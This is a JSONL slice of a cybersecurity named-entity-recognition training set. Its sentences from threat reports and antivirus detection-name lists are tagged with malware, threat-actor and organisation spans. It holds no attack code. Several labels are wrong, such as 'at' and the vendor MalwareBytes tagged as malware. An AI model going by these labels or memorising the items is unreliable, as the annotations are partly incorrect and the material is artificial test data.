{"text": "A backdoor also known as: W32.eHeur.Virus02 Worm.Seroteb.Win32.16 Win32.Trojan.WisdomEyes.16070401.9500.9522 W32/Trojan2.MQYM Worm.Win32.Seroteb.g BehavesLike.Win32.Trojan.nm W32/Trojan.QDYC-8978 Worm:Win32/Serot.A@mm Trojan.CryptRedol!B3FmVPsxcak Worm.Win32.Serot Trj/CI.A Win32/Trojan.029", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006346", "source": "cyner2_train"}}
{"text": "AT&T Alientlabs researchers has discovered new variant of BlackGuard stealer infections using spear phisng attack.", "spans": {"ORGANIZATION: AT&T Alientlabs researchers": [[0, 27]], "MALWARE: variant": [[47, 54]], "MALWARE: BlackGuard stealer": [[58, 76]]}, "info": {"id": "cyner2_train_006347", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Goabeny.A8 Trojan.Delf.Win32.88456 HT_GRAFTOR_GI070668.UVPM HT_GRAFTOR_GI070668.UVPM Trojan.Win32.Sdbot.ercwiz TrojWare.Win32.Delf.QJW BackDoor.IRC.Sdbot.34285 BehavesLike.Win32.Trojan.dc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006348", "source": "cyner2_train"}}
{"text": "One interesting thing is that it added some other functions you wouldn't expect to try and emphasize it wasn't a malicious tool by including a piano game and fun manager", "spans": {}, "info": {"id": "cyner2_train_006349", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Riskware.Win32.Winnti.erfdhv Win32.Winnti.1 HackTool:Win32/Passdash.A!dha Trj/CI.A Win32.Risk.Adware.Ecbn Win32/Virus.Adware.708", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006351", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Trojan.RBLM-5940 Trojan[Dropper]/Win32.Dapato TrojanDownloader:Win32/Dapato.M Trojan.Symmi.DB644 Trojan.DR.Dapato!vPidh5qsMRE W32/Onlinegames.QRT!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006352", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.CA66 not-a-virus:Downloader.Win32.Elex.u Riskware.Win32.WinZipper.eoijjb Adware.Mutabaha.229 Pua.337.Technologies RiskWare[Downloader]/Win32.Elex.u PUP.Adware.Elex Adware.Elex.612528.A not-a-virus:Downloader.Win32.Elex.u PUP.Optional.Elex PUA.Downloader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006353", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.542D Trojan.Zenshirsh.SL7 TSPY_MSPOSER.SMZ TSPY_MSPOSER.SMZ Trojan-Dropper.Win32.Daws.dxwt BehavesLike.Win32.Sality.mc Trojan.Win32.Sisron Trojan:Win32/Blihan.A Trj/GdSda.A Trojan.Win32.Sisron.weqa Win32/Trojan.a66", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006354", "source": "cyner2_train"}}
{"text": "a Federal contractor command and control domains, we couldn't help but notice a peculiar related OPM-themed domain, opm-learning[.]org.", "spans": {"MALWARE: command and control": [[21, 40]]}, "info": {"id": "cyner2_train_006355", "source": "cyner2_train"}}
{"text": "This campaign was sent to millions of recipients across numerous organizations primarily in Australia.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]]}, "info": {"id": "cyner2_train_006357", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9966 Trojan.Win32.Disfa.eoyfmo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006359", "source": "cyner2_train"}}
{"text": "Malware authors are evolving their techniques to evade network and host-based detection mechanisms.", "spans": {"THREAT_ACTOR: Malware authors": [[0, 15]]}, "info": {"id": "cyner2_train_006363", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.VBbot!O Trojan.Jorik.Win32.68017 Win32.Trojan.WisdomEyes.16070401.9500.9994 Trojan.ADH.2 Win.Trojan.Dishigy-5 Worm.Win32.WBNA.ipa Trojan.VbCrypt.68 BehavesLike.Win32.Backdoor.dc Trojan.Win32.Spyeye Worm/Kolab.fyb Worm.Win32.WBNA.ipa Trojan/Win32.Bifrose.C110110 Trojan.Injector!36BeufFOyC8 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006365", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Other:Android.Reputation.2 HEUR:Trojan-Downloader.AndroidOS.Masplot.a Riskware.Android.RemoteCode.epsqsx Troj.Downloader.Androidos!c Android/Masplot.A!tr.dldr Trojan[Downloader]/Android.Masplot HEUR:Trojan-Downloader.AndroidOS.Masplot.a Android-PUP/Metasploit.5b3de a.gray.stdon", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006366", "source": "cyner2_train"}}
{"text": "This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents.", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "THREAT_ACTOR: malicious actor": [[28, 43]]}, "info": {"id": "cyner2_train_006367", "source": "cyner2_train"}}
{"text": "Because we hate scammers of all types but especially these guys -- tricking people out of their money by lying to them is evil here are some more Tech Support Scam sites, along with some sample screenshots to give you a sense of the different ways they pitch their scams:", "spans": {}, "info": {"id": "cyner2_train_006368", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Mofei.A Trojan.Win32.Mofeir.ruhef W32/Mofei.A W32.Femot.Worm WORM_MOFEI.A Win32.Femot Net-Worm.Win32.Mofeir.a Win32.Worm.Mopfei.B I-Worm.Mofai!mDpfss79YzI Worm.Win32.Mofei.A Win32.Worm.Mopfei.B BackDoor.Mofei BDS/Mofeir.101.B WORM_MOFEI.A Backdoor/Mofei.101 Worm.Mofeir.kcloud Backdoor:Win32/Mofeir.1_01 Worm.Win32.MoFei.11776 Worm/Win32.Mytob Win32.Worm.Mopfei.B W32/Mofei.CGUW-2000 Worm.Mofeir Net-Worm.Femot Win32/Mofei.A Net-Worm.Win32.Mofeir W32/MoFei.D!worm Worm/Mofeir.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006369", "source": "cyner2_train"}}
{"text": "How do Android devices become infected ? We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores .", "spans": {"MALWARE: Gooligan": [[64, 72]], "SYSTEM: Android": [[138, 145]]}, "info": {"id": "cyner2_train_006372", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Win32.Trojan.FlyStudio.F Riskware.Win32.Adw.dneswh Trojan.MulDrop6.42243 BehavesLike.Win32.PWSZbot.tm Trojan.Win32.Seodec TR/Seodec.abne RiskWare[Downloader]/Win32.AdLoad Trojan:Win32/Seodec.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006373", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RustogaLTF.Worm Backdoor/W32.Androm.37888 Worm.Kasidet.20653 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Neutrino-6 Backdoor.Win32.Androm.hkrm Trojan.Win32.Neutrino.cwggio BackDoor.Neutrino.1 BehavesLike.Win32.VTFlooder.nh Backdoor/Androm.kfh Trojan[Backdoor]/Win32.Androm Worm:Win32/Kasidet.A Backdoor.Win32.Androm.hkrm Backdoor.Neutrino", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006375", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VBKryptPS.Trojan Trojan/W32.VBKrypt.147456.CC Downldr.Umbald.S624840 Trojan.VBKrypt.Win32.179340 Troj.W32.VBKrypt.tpcC Trojan/VBKrypt.mhte Win32.Trojan.WisdomEyes.16070401.9500.9970 W32/VBTrojan.Dropper.4!Maximus Trojan.VBKrypt Trojan.Win32.VBKrypt.xabo Trojan.Win32.Umbra.efkzrr Trojan.Win32.A.VBKrypt.147456.YW BackDoor.Umbra.10 W32/VBTrojan.Dropper.4!Maximus Trojan/VBKrypt.hmyy Trojan/Win32.VBKrypt Win32.Troj.VBKrypt.kcloud TrojanDownloader:Win32/Umbald.A Trojan.Symmi.DD60 Trojan.Win32.VBKrypt.xabo Trojan/Win32.Jorik.R27694 Trojan.Crypt Win32/Delf.AVY W32/VBKrypt.MBSX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006376", "source": "cyner2_train"}}
{"text": "The malware calls itself Grabit and is distinctive because of its versatile behavior.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: Grabit": [[25, 31]]}, "info": {"id": "cyner2_train_006378", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Botter Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Wortrik Email-Worm.Win32.Botter.bv Trojan.Win32.Botter.eroupz Email.Worm.W32!c Win32.HLLW.Phorpiex.222 Worm.AutoRun.Win32.131461 Worm.Win32.Phorpiex Worm.Botter.j Email-Worm.Win32.Botter.bv Worm:Win32/Dipasik.C!bit Trojan/Win32.Phorpiex.C1326764 BScope.Trojan.IRCbot Win32.Worm-email.Botter.Hyy W32/IRCBot.C!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006381", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VB.Win32.155357 Trojan.Symmi.DEA81 Win32.Trojan.VB.hs Trojan.Win32.VB.ebwbzr TrojWare.Win32.Downloader.FraudLoad.R BehavesLike.Win32.BadFile.vh W32/VB.GI!tr Trojan:Win32/Tacpud.A Trojan/Win32.VB.C2028217 Trj/GdSda.A Win32.Trojan.Vb.Amcv Trojan.VB!9TqYT8CSaE0 Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006382", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.E9A8 Trojan.Zusy.D3F56 Win32.Trojan.WisdomEyes.16070401.9500.9972 W32/Backdoor.RTBO-4851 Backdoor.Trojan BKDR_EXPLOIT.AN Win.Trojan.Ploit-1 BackDoor.Xconf.21 BKDR_EXPLOIT.AN W32/Backdoor.KWF BDS/DarkView.A.3 Backdoor:Win32/DarkView.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006383", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_WEVARM.SM Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_WEVARM.SM Win.Trojan.Regrun-429 Trojan.Win32.KillProc.boctad Trojan.Win32.Z.Regrun.1865432 W32.W.AutoRun.l6Zu Trojan.KillProc.12652 BehavesLike.Win32.VirRansom.tc TrojanDropper:Win32/Vixemb.A Trojan.KillProc Trj/CI.A Worm.Swimnag!wS08av/7yqU Worm.Win32.Swimnag W32/Swimnag.E!tr Win32/Trojan.1e8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006384", "source": "cyner2_train"}}
{"text": "OpcJacker is an interesting piece of malware, since its configuration file uses a custom file format to define the stealer's behavior.", "spans": {"MALWARE: OpcJacker": [[0, 9]], "MALWARE: malware,": [[37, 45]], "THREAT_ACTOR: stealer's": [[115, 124]]}, "info": {"id": "cyner2_train_006385", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zbot.Win32.171106 Win32.Trojan.Zbot.a Trojan.Zbot TSPY_ZBOT.SMQF Win.Spyware.Zbot-1275 Trojan-Spy.Win32.Zbot.wqpm Trojan.Win32.Panda.cqqwdy Trojan-Spy:W32/Zbot.AVTH Trojan.PWS.Panda.11236 TSPY_ZBOT.SMQF BehavesLike.Win32.PWSZbot.dh Trojan/Win32.Unknown Trojan.Kazy.D359E8 Spyware/Win32.Zbot.R27121 SScope.Trojan.FakeAV.01110 Win32/Spy.Zbot.AAO Trojan.Win32.Zbot.aaw TrojanSpy.Zbot!A8UvbpHn23U Trojan-Spy.Banker.Citadel W32/Zbot.AT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006387", "source": "cyner2_train"}}
{"text": "This pulse contains indicators related to a phishing campaign launched against the US election system in 2016.", "spans": {"THREAT_ACTOR: a phishing campaign": [[42, 61]], "ORGANIZATION: the US election system": [[79, 101]]}, "info": {"id": "cyner2_train_006388", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Dorgam!O Win32.Trojan-Dropper.Dorgam.cgdc Backdoor.Bifrose Trojan.Win32.Clicker.ddouvz Trojan.Win32.A.PSW-QQPass.802816 Trojan.Click2.1642 BehavesLike.Win32.BadFile.ch TR/Taranis.4038 Backdoor:Win32/Babmote.A Troj.W32.Sasfis.lqzi Win32.Trojan.FlyStudio.F TrojanDropper.Dorgam Trojan.DR.Dorgam!Cb+DVu4OzCQ W32/QQPass.YZN!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006389", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Modphip.A3 Trojan.Graftor.D45BA7 Win32.Trojan.WisdomEyes.16070401.9500.9995 Win32/Pilleuz.H Packed.Win32.Krap.hm Trojan.Win32.Krap.bsvym Trojan.Packed.20343 Trojan.Win32.Yakes Trojan[Packed]/Win32.Krap Trojan:Win32/Modphip.A Packed.Win32.Krap.hm Trojan/Win32.Krap.R35222 BScope.P2P-Worm.Palevo W32/Kryptik.DKU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006390", "source": "cyner2_train"}}
{"text": "The stolen information was transmitted back to the threat actors' infrastructure in an encrypted format.", "spans": {"THREAT_ACTOR: the threat actors'": [[47, 65]], "SYSTEM: infrastructure": [[66, 80]]}, "info": {"id": "cyner2_train_006391", "source": "cyner2_train"}}
{"text": "Based on reports, as of 2014, it has global users of more than 490 million registered users.", "spans": {}, "info": {"id": "cyner2_train_006392", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Proxy.21493 BehavesLike.Win32.VBObfus.nm Trojan.Trickster.a Trojan:Win32/Donvba.A Trojan.Jaik.D3551 Trojan/Win32.Fareit.C1614161 W32/Injector.DGQK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006395", "source": "cyner2_train"}}
{"text": "It contained a part of recently leaked Zeus source code, which allowed Ramnit to become a banking trojan.", "spans": {"MALWARE: Zeus source code,": [[39, 56]], "MALWARE: Ramnit": [[71, 77]], "MALWARE: a banking trojan.": [[88, 105]]}, "info": {"id": "cyner2_train_006397", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Garex Trojan.Win64.Wurser.b Troj.Win64.Wurser!c Trojan.Win64.Wurser W64/Trojan.LBAM-3513 Trojan.Win64.Wurser.b Backdoor:Win32/Garex.B!dha Trojan.Win64.Wurser Win64.Trojan.Wurser.Peqd Win32/Trojan.7be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006399", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Inject Win32.Trojan.Delf.am W32/Trojan.SHRZ-8205 Win32.Worm.Delf.Dxcp Trojan.PWS.Banks.799 W32.W.AutoRun.lmnK Backdoor:Win32/Aybo.B Trojan.Delf Trojan.Win32.VMProtect Win32/Trojan.079", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006400", "source": "cyner2_train"}}
{"text": "On several occasions, we verified that these details are correct for the intended victim.", "spans": {}, "info": {"id": "cyner2_train_006401", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Packed-76 Trojan-Downloader.Win32.Qvod.col Trojan.Win32.Swisyn!IK Trojan.Win32.Swisyn W32/Qvod.EF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006403", "source": "cyner2_train"}}
{"text": "The Wekby actors have recently been observed compromising organizations in the Manufacturing, Technology and Utilities verticals, but have had a long standing interest in the HealthCare industry.", "spans": {"THREAT_ACTOR: Wekby actors": [[4, 16]], "ORGANIZATION: organizations": [[58, 71]], "ORGANIZATION: Manufacturing, Technology": [[79, 104]], "ORGANIZATION: Utilities verticals,": [[109, 129]], "ORGANIZATION: the HealthCare industry.": [[171, 195]]}, "info": {"id": "cyner2_train_006405", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Redrac.A@mm Win32.Redrac.A@mm Win32.Redrac.A@mm Trojan.Win32.Redrac.enor W32.Redrac@mm Win32/Redrac.A Email-Worm.Win32.Redrac Win32.Redrac.A@mm Worm.Redrac!vQPr8wluFnM W32.W.Redrac!c Win32.Redrac.A@mm Worm.Win32.Redrac.A Win32.Redrac.A@mm Win32.HLLM.Redrac Worm.Redrac.Win32.1 BehavesLike.Win32.AdwareRBlast.cc W32/Redrac.AFIQ-7566 Worm/Sramota.axa WORM/Redrac.A Worm[Email]/Win32.Redrac Win32.Redrac.E90817 Trojan/Win32.Xema Worm:Win32/Redrac.A@mm Virus.Win32.Heur.l W32/Gnome.C.worm Win32.Redrac.A@mm I-Worm/Redrac.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006407", "source": "cyner2_train"}}
{"text": "It provides a robust set of capabilities, including: file transfer, screen capture, keystroke logging, process injection, process manipulation, and task scheduling.", "spans": {}, "info": {"id": "cyner2_train_006409", "source": "cyner2_train"}}
{"text": "A common misconfiguration attempts to download the non-existant file at http://www.server.com/sqlite3.dll", "spans": {}, "info": {"id": "cyner2_train_006411", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Ladex.A@mm W32/Ladex.worm W32.W.Ladex.a!c W32/Ladex.worm Win32.Ladex.E90817 W32.Dalbug.Worm Win32/Ladex.A Win.Worm.Ladex-1 Worm.Win32.Ladex.a Win32.Ladex.A@mm Trojan.Win32.Ladex.bxker Win32.Ladex.A@mm Worm.Win32.Ladex.A Win32.Ladex.A@mm Win32.HLLW.Ladex Worm.Ladex.Win32.2 W32/Ladex.worm W32/Risk.UDJC-2718 WORM/Ladex.A W32/Ladex.A!worm Worm/Win32.Ladex Worm.Win32.Ladex.a Win32.Ladex.A@mm Worm.Ladex W32/Ladex.D.worm Worm.Win32.Ladex.a.2 Trojan-IM.Win16.PS Win32.Ladex.A@mm Win32/Worm.f02", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006413", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ZbalCS.S302126 Backdoor.Konus.Win32.1 Trojan/Kryptik.flew Trojan.Midie.D88E4 TROJ_KRYPTIK_GC140164.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9700 TROJ_KRYPTIK_GC140164.UVPM Win.Trojan.Ag-4254306-1 Trojan.Win32.Kryptik.emceui Trojan.DownLoader23.52205 BehavesLike.Win32.PWSZbot.fc Backdoor.Konus.b TR/Crypt.EPACK.rguwm Backdoor.Konus! W32/Kryptik.FLEW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006415", "source": "cyner2_train"}}
{"text": "Enterprises are currently being targeted by the macro malware BARTALEX in a recent outbreak of thousands of spammed emails.", "spans": {"MALWARE: macro malware BARTALEX": [[48, 70]]}, "info": {"id": "cyner2_train_006416", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Ares.A Backdoor/W32.Aresdor.15872 Backdoor/Aresdor.13 Backdoor.Ares.A W32/Risk.WUTO-4007 Backdoor.Trojan Win32/Aresdor.13.C BKDR_ARESDOR.A Backdoor.Win32.Aresdor.13 Trojan.Win32.Aresdor.dblp Backdoor.Win32.Z.Aresdor.15872[h] Backdoor.W32.Aresdor.13!c Backdoor.Ares.A Backdoor.Win32.Aresdor.13.C Backdoor.Ares.A BackDoor.Ares.13 Backdoor.Aresdor.Win32.3 BKDR_ARESDOR.A Backdoor/Aresdor.a BDC/Aresdor.13.1.A W32/Ares.C!tr.bdr Trojan[Backdoor]/Win32.Aresdor Backdoor.Ares.A Win-Trojan/Aresdor.15872 Backdoor:Win32/Ares.A Backdoor.Ares.A Backdoor.Aresdor Win32.Backdoor.Aresdor.Wpte Backdoor.Aresdor!SN6VLScBnkQ Trojan.Win32.Aresdor Backdoor.Ares.A BackDoor.Aresdor.C Backdoor.Win32.Aresdor.13 Win32/Backdoor.a98", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006417", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Dropper.E W97M/DownldExe.A W97M.Downloader W97M/DownldExe.A W2000M/Dldr.Jetoypt.A W97M/Dloader.NCN!tr HEUR.VBA.Trojan Heur.MSWord.Downloader.b Trojan-Downloader.W97M.Small Macro.Trojan-Downloader.Broxoff.B heur.macro.download.e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006418", "source": "cyner2_train"}}
{"text": "It highlights the analysis flow using two of our flagship products, Security Analytics SA and the Enterprise Compromise Assessment Tool ECAT, for an Advance Persistent Threat APT intrusion investigation.", "spans": {"SYSTEM: flagship products, Security Analytics SA": [[49, 89]], "SYSTEM: the Enterprise Compromise Assessment Tool ECAT,": [[94, 141]], "THREAT_ACTOR: Advance Persistent Threat APT": [[149, 178]]}, "info": {"id": "cyner2_train_006419", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Perkesh.B TrojanDropper.Perkesh.C2 Trojan.Perkesh.B Trojan/Downloader.Fiegi.ar TROJ_PERKESH.SMF TROJ_PERKESH.SMF Trojan.Perkesh.B Trojan.Perkesh.B Trojan.Win32.Downloader.44032.DO TrojWare.Win32.Downloader.Small.ai43 Trojan.MulDrop.34331 TrojanDropper:Win32/Perkesh.C Trojan.Perkesh.B BScope.Trojan.SvcHorse.01643 Trojan.Perkesh.B Trj/Murlo.P Win32/TrojanDownloader.Perkesh.F Trojan-Downloader.Win32.Perkesh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006421", "source": "cyner2_train"}}
{"text": "MalwareBytes recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.", "spans": {"MALWARE: MalwareBytes": [[0, 12]], "THREAT_ACTOR: a campaign": [[34, 44]], "ORGANIZATION: a Saudi Arabia Government": [[55, 80]]}, "info": {"id": "cyner2_train_006422", "source": "cyner2_train"}}
{"text": "We have been monitoring a new campaign specifically targeting WordPress sites, using hundreds of them for SEO spam distribution.", "spans": {"THREAT_ACTOR: campaign": [[30, 38]]}, "info": {"id": "cyner2_train_006423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/VB.auv BKDR_VB.GXX Win32.Trojan.WisdomEyes.16070401.9500.9813 W32/Backdoor2.EBKN Backdoor.Trojan BKDR_VB.GXX Backdoor.Win32.VB.apw Trojan.Win32.VB.ehzv Backdoor.Win32.S.VB.1007657.A Backdoor.W32.VB.apw!c Backdoor.Win32.VB.~UU Backdoor.VB.Win32.2378 BehavesLike.Win32.Trojan.dm W32/Backdoor.LCBL-3812 BDS/VB.A.109 Trojan[Backdoor]/Win32.VB Backdoor.Win32.VB.apw Trojan/Win32.Xema.C44642 BScope.Trojan-Dropper.Injector Trj/SpyMaster.C Win32/VB.AUV Win32.Backdoor.Vb.srv Backdoor.VB!xTNIvgAXzis Backdoor.Win32.VB W32/VB.0F07!tr Win32/Backdoor.8f4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006424", "source": "cyner2_train"}}
{"text": "The last time I wrote about poker-related malware, it was about PokerAgent, a trojan propagating through Facebook that was used to steal Facebook users' logon credentials, credit card information and the level of Zynga poker credit.", "spans": {"MALWARE: poker-related malware,": [[28, 50]], "MALWARE: PokerAgent,": [[64, 75]], "MALWARE: trojan": [[78, 84]], "ORGANIZATION: Facebook": [[105, 113], [137, 145]]}, "info": {"id": "cyner2_train_006425", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke/W32.BadJoke.230912 Hoax.Fakedel JokeTool.RJLSoftware Aplicacion/FakeDel.c W32/Joke.BE Joke.FakeDel JOKE_FAKEDEL.C Win.Joke.FakeDelete-1 Hoax.Win32.BadJoke.FakeDel.c Riskware.Win32.FakeDel.hsrd Hoax.W32.BadJoke.FakeDel.c!c Joke.Fakedel Tool.BadJoke.Win32.441 JOKE_FAKEDEL.C not-a-virus:BadJoke.Win32.FakeDel.b W32/Joke.HLOW-7548 Hoax.BadJoke.FakeDel.a Joke:Win32/Fakedel.C JOKE/FakeDel.C HackTool[Hoax]/Win32.FakeDel Joke:Win32/Fakedel.C Hoax.Win32.BadJoke.FakeDel.c BadJoke.Win32.FakeDel.c Joke/Fakedel.D Win32.Trojan-psw.Badjoke.Svrk Trojan.BadJoke!Ig2iP/M1kgM Win32/Joke.309", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006426", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.921B Trojan.Win32.VBKrypt!O Trojan.VBKrypt Trojan.Heur.E6E8D0 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.VBKrypt.hrqc Trojan.Win32.Drop.bccyya Trojan.Win32.Z.Vbkrypt.602112.J Trojan.MulDrop2.63923 BehavesLike.Win32.Trojan.hc Trojan.Win32.VB Trojan/VBKrypt.gkpp Trojan/Win32.VBKrypt Trojan:Win32/Msposer.A Trojan.Win32.VBKrypt.hrqc Trojan.VBKrypt Win32.Trojan.Vbkrypt.Phrb W32/Refroso.AGEA!tr Win32/Trojan.169", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006427", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.W32.Autoit!c TROJ_FILPOR.AI Backdoor.Enfourks TROJ_FILPOR.AI Trojan.Win32.Autoit.ezc Trojan.Win32.Autoit.ecevvi Trojan.DownLoader21.32598 Trojan.Autoit.Win32.30656 BehavesLike.Win32.Autorun.hc TR/Autoit.qhpu Trojan.Win32.Autoit.ezc Trojan:Win32/Filpor.A Win32.Trojan.Autoit.Pepf Trojan.Win32.Autoit W32/Autoit.EZC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006428", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DropperHQc.Trojan Trojan.Dropper.UUW Trojan.Dynamer.A4 W32/Trojan.YSAI-0703 Win32/Tnega.ARWO Trojan-Spy.MSIL.KeyLogger.cssc Trojan.Dropper.UUW Trojan.Win32.Drop.ewucrk Uds.Dangerousobject.Multi!c Trojan.Dropper.UUW Trojan.DownLoader1.49310 BehavesLike.Win32.Shodi.cc Trojan.Dropper.UUW Trojan.Win32.Z.Dropper.833273 Trojan-Spy.MSIL.KeyLogger.cssc TrojanDropper:Win32/FakeFlexnet.A Trojan.Dropper.UUW Trojan.Dropper.UUW Hoax.Win32.BadJoke Trj/CI.A Win32/Trojan.BO.19d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006429", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom/W32.Blocker.3262976 Trojan.MSIL.FC.4195 Win32.Trojan.WisdomEyes.16070401.9500.9943 W32/Trojan.RPCY-7702 Ransom_Blocker.R038C0DAH18 Trojan-Ransom.Win32.Blocker.juiv Trojan.Win32.Blocker.etmtcp Trojan.Win32.Z.Blocker.3262976.X Troj.Ransom.W32.Blocker!c Trojan.MulDrop7.48467 Ransom_Blocker.R038C0DAH18 Trojan[Ransom]/Win32.Blocker Trojan.MSILPerseus.D107B2 Trojan-Ransom.Win32.Blocker.juiv TrojanSpy:MSIL/Reven.A!bit Trojan/Win32.Blocker.R203232 Ransom.FileCryptor Trj/CI.A Win32.Trojan.Blocker.Aiip Trojan.MSIL.Spy Win32/Trojan.Ransom.df0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006431", "source": "cyner2_train"}}
{"text": "A few weeks ago Cisco Talos became interested in just such a campaign with a smaller number of circulating email messages.", "spans": {"ORGANIZATION: Cisco Talos": [[16, 27]], "THREAT_ACTOR: campaign": [[61, 69]]}, "info": {"id": "cyner2_train_006432", "source": "cyner2_train"}}
{"text": "As FileCoder was incomplete at the time of its discovery, we believe KeRanger is the first fully functional ransomware seen on the OS X platform.", "spans": {"MALWARE: FileCoder": [[3, 12]], "MALWARE: at": [[28, 30]], "MALWARE: KeRanger": [[69, 77]], "MALWARE: fully functional ransomware": [[91, 118]], "SYSTEM: OS X platform.": [[131, 145]]}, "info": {"id": "cyner2_train_006433", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike:Win32.Malware DLOADER.Trojan SHeur.CDXP Heuristic.Malware", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006434", "source": "cyner2_train"}}
{"text": "Banking trojans are among some of the biggest threats to everyday users as they directly impact the user in terms of financial loss.", "spans": {"MALWARE: Banking trojans": [[0, 15]], "MALWARE: threats": [[46, 53]], "ORGANIZATION: user": [[100, 104]]}, "info": {"id": "cyner2_train_006435", "source": "cyner2_train"}}
{"text": "Remsec is a stealthy tool that appears to be primarily designed for spying purposes.", "spans": {"MALWARE: Remsec": [[0, 6]], "MALWARE: stealthy tool": [[12, 25]]}, "info": {"id": "cyner2_train_006437", "source": "cyner2_train"}}
